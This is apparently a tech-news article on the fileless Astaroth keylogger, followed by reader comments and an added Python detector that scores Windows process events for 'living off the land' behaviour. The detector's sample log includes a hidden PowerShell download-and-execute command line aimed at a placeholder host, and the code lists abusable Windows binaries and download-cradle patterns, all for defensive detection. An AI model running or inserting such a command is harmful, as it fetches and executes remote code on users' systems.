New Super Stealth Astaroth Malware Records Keystrokes
Microsoft has warned users about a complicated but cunning malware attack that might not be caught by all security tools. The "Astaroth" malware doesn't actually exist as a file in its own right.
The main risk to users from Astaroth is that it includes a keylogger. This means it can access everything victims type, including passwords and other sensitive data. That's one of the reasons sites such as online banks often ask users to type specific characters of a password (such as the third and eighth) rather than the entire password.
Malware Hides Within Windows
What makes Astaroth so hard to detect is that it uses a technique dubbed "living off the land." It's a sophisticated and complicated approach, but in simple terms the malware doesn't have any executable files. Instead, it runs within legitimate Windows processes. (Source: medium.com)
That's a big problem for many security tools that work by scanning computers and monitoring downloads to look for files that are either known to be malicious or show suspicious characteristics. Such tools don't usually interfere with Windows processes as this could affect the smooth running of a computer and deter people from using the security tools.
The good news is that other anti-malware techniques can spot Astaroth, including Microsoft Defender ATP. That was previously a commercial product aimed at businesses but is now built into Windows 10 by default.
Dubious Links Distribute Danger
These techniques involve monitoring activity on the computer for signs of something amiss. A Microsoft spokesman said that "Some of the fileless techniques may be so unusual and anomalous that they draw immediate attention to the malware, in the same way that a bag of money moving by itself would." (Source: theinquirer.net)
The way the malware gets onto computers in the first place is nothing new: it's spread by bogus emails that encourage users to click on a link to a file. In this case the file is in .lnk format, which is normally used for shortcuts to Windows applications, such as those that appear on a desktop. Once the .lnk file is clicked, it downloads the malware.
What's Your Opinion?
Do you understand how your chosen security tools work? Is it worth the extra demand on resources to have security software that runs continuously rather than just scanning files when necessary? Should email providers and browsers have an option to warn users to think carefully before opening any attachment or following a link in an email?
My name is Dennis Faas and I am a senior systems administrator and IT technical analyst specializing in cyber crimes (sextortion / blackmail / tech support scams) with over 30 years experience; I also run this website!
Comments
Astaroth Malware
Other than Microsoft Defender ATP are there any other anti-malware programs that protect your system from this?
"living off the land."
"living off the land." means that this virus takes advantage of programs that m$ put on your computer that you probably never use.
How do we shut them off?
Typical "living off the land" exploit
I've looked into this more in depth, and an example of a "living off the land" exploit might involve downloading a script stored on a website (externally), then using a localized program such as powershell to execute said script.
This type of attack is nothing magical except that there are physically no malware-laden executables (EXEs) running except for the powershell itself, which takes its arguments from the malicious script. Hence this is by definition "living off the land" because it is now considered "stealth" with no EXEs.
We can assume execution of that script via powershell is done using administrative privileges. The only way for this to happen would likely involve the system already being infected with some sort of malware executable, or the user being tricked into social engineering, though this would be difficult at best to pull off.
As for protection, make backups and scan your system for malware regularly, patch the system, etc. Read this article on how to stay protected.
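The article says behaviour-based tools catch Astaroth by watching for activity that is "unusual and anomalous" rather than by scanning for a malicious file, and the comment above describes the concrete shape of that activity: a legitimate program such as powershell running a script it fetched from a website. The following is an added example (not Microsoft's, not Defender ATP's, and not the commenter's code) of what such a behavioural check looks like in practice: it scores process-creation events for a script host launched from a user-facing program with command-line features typical of download-and-execute chains. The pipe-delimited log format, the watchlist of signed Windows binaries, the scoring weights and the four sample events are all constructed for this example and are not details taken from the article.

```python
"""Behavioural detector for "living off the land" process chains.

Added example for this article; it is not code from Microsoft, from
Microsoft Defender ATP, or from the commenters. The log format, the
watchlist of Windows binaries, the weights and the sample events are
constructed for the example.
"""
import re
from dataclasses import dataclass, field
from typing import List

# Constructed log format (assumption): one process-creation event per line,
# pipe-delimited: timestamp|pid|ppid|parent_image|image|command_line
SAMPLE_LOG = r"""
2019-07-09T10:00:01|4120|1200|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -NoProfile -WindowStyle Hidden -Command "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.txt')"
2019-07-09T10:00:05|4188|1200|C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe C:\Users\alice\report.txt
2019-07-09T10:01:10|4300|3990|C:\Windows\System32\cmd.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -File C:\scripts\backup.ps1
2019-07-09T10:02:33|4412|2215|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\System32\wscript.exe|wscript.exe //B C:\Users\alice\AppData\Local\Temp\invoice.vbs
""".strip()

# Assumed watchlist: signed Windows binaries that can run code supplied as
# arguments, so no new EXE has to be written to disk. Tune per environment.
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                "wmic.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe",
                "bitsadmin.exe"}
# Programs a user interacts with directly; a script host spawned from one of
# these usually means a clicked attachment, link or shortcut.
USER_LAUNCHERS = {"explorer.exe", "winword.exe", "excel.exe", "outlook.exe"}

# Command-line traits that each add one point to the score.
ARG_PATTERNS = [
    ("download cradle", re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I)),
    ("inline expression", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("remote url", re.compile(r"https?://", re.I)),
    ("hidden window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("encoded command", re.compile(r"-e(nc|ncodedcommand)?\s+\S", re.I)),
    ("script from temp dir", re.compile(r"\\temp\\[^\s]+\.(vbs|js|ps1|hta)\b", re.I)),
]


@dataclass
class ProcEvent:
    ts: str
    pid: int
    ppid: int
    parent_image: str
    image: str
    cmdline: str


@dataclass
class Finding:
    pid: int
    image: str
    score: int
    reasons: List[str] = field(default_factory=list)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, for watchlist lookups."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_log(text: str) -> List[ProcEvent]:
    """Parse the constructed pipe-delimited format; the command line is the
    last field and may itself contain '|', hence maxsplit=5."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, pid, ppid, parent, image, cmdline = line.split("|", 5)
        events.append(ProcEvent(ts, int(pid), int(ppid), parent, image, cmdline))
    return events


def score_event(ev: ProcEvent) -> Finding:
    """Score one event: +2 for a user-facing parent, +1 for a chained script
    host parent, +1 per suspicious command-line trait. Non-script-host images
    score 0 so ordinary programs never trip the detector."""
    f = Finding(ev.pid, basename(ev.image), 0)
    if f.image not in SCRIPT_HOSTS:
        return f
    parent = basename(ev.parent_image)
    if parent in USER_LAUNCHERS:
        f.score += 2
        f.reasons.append(f"{parent} spawned {f.image}")
    elif parent in SCRIPT_HOSTS:
        f.score += 1
        f.reasons.append(f"chained script hosts: {parent} -> {f.image}")
    for label, pat in ARG_PATTERNS:
        if pat.search(ev.cmdline):
            f.score += 1
            f.reasons.append(label)
    return f


def detect(log_text: str, threshold: int = 3) -> List[Finding]:
    """Return the events whose score reaches the threshold."""
    return [f for f in (score_event(e) for e in parse_log(log_text)) if f.score >= threshold]


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"pid {f.pid} {f.image} score={f.score}: {', '.join(f.reasons)}")
```

On the constructed sample the detector flags the explorer-launched PowerShell with a hidden window and a download-and-execute command line, and the Word-launched wscript running a script out of the user's Temp folder; the notepad launch and the administrator's scheduled backup script (PowerShell started from cmd.exe with a local .ps1) score too low to be reported. The threshold is the knob that trades missed detections against noise from legitimate scripting, which is exactly the resource-versus-coverage question the article raises: a file scanner would have nothing to inspect here, because the only new file on disk is a shortcut.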